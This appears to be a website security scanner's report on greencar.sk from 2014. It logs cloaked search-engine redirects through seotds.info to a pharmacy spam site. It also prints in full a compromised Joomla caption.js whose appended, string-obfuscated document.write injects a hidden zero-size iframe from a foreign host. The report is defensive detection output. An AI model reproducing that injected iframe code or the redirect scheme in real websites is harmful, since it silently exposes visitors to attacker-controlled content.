Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://greencar.sk/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: greencar.sk Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 307 Temporary Redirect Connection: close Date: Tue, 02 Sep 2014 21:42:20 GMT Location: http://seotds.info/in.cgi?6¶meter=greencar.sk&ur=1&HTTP_REFERER=greencar.sk&googlekeywords=zovirax+cold+sore+cream+price&se=http%3A%2F%2Fwww.google.com%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3Dgreencar.sk%26source%3Dweb%26cd%3D1%26ved%3D0CDEQFjAG%26url%3Dhttp%3A%252F%252Fgreencar.sk%252F%26ei%3DwC7yT5qCJbCCkQKtnwE%26usg%3DAFQjCNGEeYp3D7uuNLAJxMIVliLyQ9O_Pg Server: nginx Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html Set-Cookie: analytics=true; expires=Wed, 02-Sep-2015 21:42:20 GMT; path=/ | malicious |
URL: http://seotds.info/in.cgi?6¶meter=greencar.sk&ur=1&HTTP_REFERER=greencar.sk&googlekeywords=zovirax+cold+sore+cream+price&se=http%3A%2F%2Fwww.google.com%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3Dgreencar.sk%26source%3Dweb%26cd%3D1%26ved%3D0CDEQFjAG%26url%3Dhttp%3A%252F%252Fgreencar.sk%252F%26ei%3DwC7yT5qCJbCCkQKtnwE%26usg%3DAFQjCNGEeYp3D7uuNLAJxMIVliLyQ9O_Pg (imitation of visitor from search engine) GET /in.cgi?6¶meter=greencar.sk&ur=1&HTTP_REFERER=greencar.sk&googlekeywords=zovirax+cold+sore+cream+price&se=http%3A%2F%2Fwww.google.com%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3Dgreencar.sk%26source%3Dweb%26cd%3D1%26ved%3D0CDEQFjAG%26url%3Dhttp%3A%252F%252Fgreencar.sk%252F%26ei%3DwC7yT5qCJbCCkQKtnwE%26usg%3DAFQjCNGEeYp3D7uuNLAJxMIVliLyQ9O_Pg HTTP/1.1 Host: seotds.info Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Connection: close Date: Tue, 02 Sep 2014 21:45:02 GMT Location: http://canadianthepills.com?6¶meter=greencar.sk&ur=1&HTTP_REFERER=greencar.sk&googlekeywords=zovirax+cold+sore+cream+price&se=http%253A%252F%252Fwww.google.com%252Furl%253Fsa%253Dt%2526rct%253Dj%2526q%253Dgreencar.sk%2526source%253Dweb%2526cd%253D1%2526ved%253D0CDEQFjAG%2526url%253Dhttp%253A%25252F%25252Fgreencar.sk%25252F%2526ei%253DwC7yT5qCJbCCkQKtnwE%2526usg%253DAFQjCNGEeYp3D7uuNLAJxMIVliLyQ9O_Pg Server: nginx/1.0.15 Content-Length: 687 Content-Type: text/html; charset=iso-8859-1 | suspicious |
Scanned pages/files
| Request | Server response | Status |
http://greencar.sk/ | 200 OK Content-Length: 78679 Content-Type: text/html | clean |
http://greencar.sk/plugins/system/jcemediabox/js/mediaobject.js?v=1010 | 200 OK Content-Length: 3119 Content-Type: application/javascript | clean |
http://greencar.sk/plugins/system/jcemediabox/js/jcemediabox.js?v=1010 | 200 OK Content-Length: 42324 Content-Type: application/javascript | clean |
http://greencar.sk/plugins/system/jcemediabox/addons/default.js?v=1010 | 200 OK Content-Length: 1431 Content-Type: application/javascript | clean |
http://greencar.sk/plugins/system/jcemediabox/addons/twitter.js?v=1010 | 200 OK Content-Length: 461 Content-Type: application/javascript | clean |
http://greencar.sk/media/system/js/caption.js | 200 OK Content-Length: 2159 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); document.write('<iframe src="'+'ht'+'tp://xn--80a'+'ko'+'qimq.xn--p1'+'ai/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>'); Antivirus reports:
| ||
http://greencar.sk/media/system/js/modal.js | 200 OK Content-Length: 10588 Content-Type: application/javascript | clean |
http://greencar.sk/modules/mod_globalnews/scripts/slider.js | 200 OK Content-Length: 6615 Content-Type: application/javascript | clean |
http://greencar.sk/components/com_pollxt/script/json2.js | 200 OK Content-Length: 9834 Content-Type: application/javascript | clean |
http://greencar.sk/components/com_pollxt/script/pollxt.js | 200 OK Content-Length: 5725 Content-Type: application/javascript | clean |
http://greencar.sk//modules/mod_tpmenu/tpmenu/dropline/menu2.js.php?animated=Fx.Transitions.Bounce.easeOut/ | 200 OK Content-Length: 394 Content-Type: text/html | clean |
http://greencar.sk/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://greencar.sk/templates/magazine_plazza/scripts/js/js.gzip.php | 200 OK Content-Length: 5603 Content-Type: text/css | clean |
http://greencar.sk//modules/mod_bookmarkus/tmpl/bookmark_us.js/ | 404 Not Found Content-Length: 241 Content-Type: text/html | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21259 Content-Type: text/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=greencar.sk
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://greencar.sk/
Result: greencar.sk is not infected or malware details are not published yet.
Result: greencar.sk is not infected or malware details are not published yet.